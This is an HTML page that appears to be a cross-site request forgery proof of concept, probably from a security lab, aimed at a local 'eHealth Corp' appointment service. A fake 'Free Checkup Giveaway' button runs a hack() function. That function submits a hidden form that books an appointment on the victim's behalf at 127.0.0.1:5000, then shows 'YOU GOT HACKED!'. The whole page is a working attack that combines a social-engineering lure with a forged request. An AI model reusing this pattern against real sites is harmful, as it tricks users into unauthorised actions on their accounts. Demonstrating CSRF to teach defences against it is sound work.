<!doctype html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport"
        content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>eHealth Corp - Putting Your Health First</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi" crossorigin="anonymous">
    <link rel="icon" type="image/x-icon" href="{{ url_for('static',filename='assets/img/logo-solo.png') }}" />
    <style>
        .textcolour {
            color: #0baccc !important;
            ;
        }

        .contain {
            display: flex;
            flex-direction: column;
            margin: 0 auto;
            width: 60%;
            padding: 10rem;
            text-align: center;
            z-index: 10;
        }

        .buttn:hover {
            background-color: #0baccc;
            color: white;
            translate: 0px -5px;
            transform: 0.5s;
        }

        .backdrop {
            background-image: url("https://previews.123rf.com/images/rido/rido1304/rido130400061/19339049-smiling-team-of-doctors-and-nurses-at-hospital.jpg");
            background-size: 100%;
            height: 100vh;
            z-index: -10;
        }

        .blur {
            background: (255 255 255 / 0.2);
            backdrop-filter: blur(10px);
            height: 100dvh;
            width: 100%;
        }
    </style>
    <script src="https://kit.fontawesome.com/8c7f9b8b8a.js" crossorigin="anonymous"></script>
</head>


<body style="overflow-y: hidden;" class="backdrop">

    <form hidden id="hack" target="csrf-frame" action="http://127.0.0.1:5000/appointment" method="POST"
        autocomplete="off">

        <input type="text" class="form-control" name="subject" id="subject" placeholder="Subject"
            value="Pain in the Arse" />Pain in the Arse

        <textarea name="description" class="form-control" id="message" cols="30" rows="4"
            placeholder="Message">HACKED!</textarea>

        <input type="date" class="form-control" name="date" id="date" placeholder="Date" value="2024-12-12" />

        <input type="time" class="form-control" name="time" id="time" placeholder="Time" value="14:12" />
    </form>

    <iframe hidden name="csrf-frame" id="frame" width="1000px" height="1000px"></iframe>
    <div class="blur">
        <div class="contain">
            <img src="./logo-no-backgroundehealth.png" loading="lazy" style="padding-bottom: 2rem;">
            <h1 class="">Free Checkup Giveaway</h1>
            <p class="">Enter for a chance to win a free checkup at our clinic!</p>

            <button onClick="hack();" id="button" class="btn text-center buttn" style="background-color: #0baccc;">Click
                here to Participate!</button>
            <br>
            <div id="warning"></div>
        </div>
    </div>

</body>
<script>
    function hack() {
        document.getElementById("hack").submit();
        document.getElementById("warning").innerHTML = "YOU GOT HACKED!";
        console.log(document.getElementById("frame"))
    }
</script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"
    integrity="sha512-aVKKRRi/Q/YV+4mjoKBsE4x3H+BkegoM/em46NNlCqNTmUYADjBbeNefNxYV7giUp0VxICtqdrbqU7iVaeZNXA=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.5/jquery.validate.min.js"
    integrity="sha512-rstIgDs0xPgmG6RX1Aba4KV5cWJbAMcvRCVmglpam9SoHZiUCyQVDdH2LPlxoHtrv17XWblE/V/PP+Tr04hbtA=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
    crossorigin="anonymous"></script>

</html>